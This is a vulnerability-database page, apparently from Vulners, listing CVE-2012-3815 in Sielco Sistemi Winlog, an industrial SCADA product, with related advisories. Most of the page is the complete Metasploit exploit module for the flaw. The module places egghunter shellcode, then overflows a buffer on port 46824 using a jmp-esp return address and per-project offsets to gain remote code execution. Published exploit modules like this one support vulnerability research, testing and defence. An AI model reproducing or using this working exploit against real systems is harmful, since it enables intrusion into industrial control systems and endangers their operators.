Lucene search
K

Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16

🗓️ 08 Jun 2012 04:03:30Reported by Michael Messner <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 28 Views

Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16 exploit allows remote attackers to execute arbitrary cod

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-3815
8 Jun 201200:00
circl
Check Point Advisories
Sielco Sistemi Winlog Buffer Overflow - Ver2 (CVE-2012-3815)
18 May 201500:00
checkpoint_advisories
CVE
CVE-2012-3815
27 Jun 201221:00
cve
Cvelist
CVE-2012-3815
27 Jun 201221:00
cvelist
ICS
Sielco Sistemi Winlog Multiple Vulnerabilities
4 May 201206:00
ics
NVD
CVE-2012-3815
27 Jun 201221:55
nvd
Prion
Buffer overflow
27 Jun 201221:55
prion
Prion
Stack overflow
19 Aug 201220:55
prion
RedhatCVE
CVE-2012-4353
22 May 202512:06
redhatcve
Tenable Nessus
Sielco Sistemi Winlog < 2.07.18 Multiple Vulnerabilities
10 Aug 201200:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Egghunter

  def initialize(info = {})
    super(update_info(info,
      'Name'         => 'Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16',
      'Description'  => %q{
        This module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.16.
        When sending a specially formatted packet to the Runtime.exe service on port 46824,
        an attacker may be able to execute arbitrary code.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Michael Messner <devnull[at]s3cur1ty.de>'
        ],
      'References'     =>
        [
          [ 'BID', '53811'],
          [ 'CVE', '2012-3815'],
          [ 'OSVDB', '82654'],
          [ 'EDB', '18986'],
          [ 'URL', 'http://www.s3cur1ty.de/m1adv2012-001' ],
          [ 'URL', 'http://www.sielcosistemi.com/en/download/public/winlog_lite.html' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'    => 2000,
          'BadChars' => "\x00",
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'Sielco Sistemi Winlog 2.07.14/2.07.16 - Ceramics Kiln Project',
            {
              'Ret'    => 0x405153df,
              'Offset' => 167,
            }
          ], #  Jmp ESP - Vclx40.bpl - 0x405153df
          [ 'Sielco Sistemi Winlog 2.07.14 - Automatic Washing System Project',
            {
              'Ret'    => 0x405153df,
              'Offset' => 151,
            }
          ], #  Jmp ESP - Vclx40.bpl - 0x405153df
          #The reliability depends on the actual project. We need to generate some more
          #targets. Two of them for the default project and one other project is now available.
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-06-04',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(46824)])
  end

  def exploit
    connect

    egghunter,egg = generate_egghunter(payload.encoded, payload_badchars)

    print_status("Placing the shellcode")
    shellcode = rand_text_alpha(2000)
    shellcode << egg
    sock.put(shellcode)

    select(nil,nil,nil,1)

    buffer = rand_text_alpha(20)
    buffer << "\x14" * 10 	#trigger the crash
    buffer << rand_text_alpha(target['Offset'])
    buffer << [target.ret].pack('V')
    buffer << egghunter
    buffer << rand_text_alpha(69 - egghunter.length)

    print_status("Trying target #{target.name}...")
    sock.put(buffer)

    handler
    disconnect

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.9High risk
Vulners AI Score7.9
CVSS 29.3
EPSS0.80822
28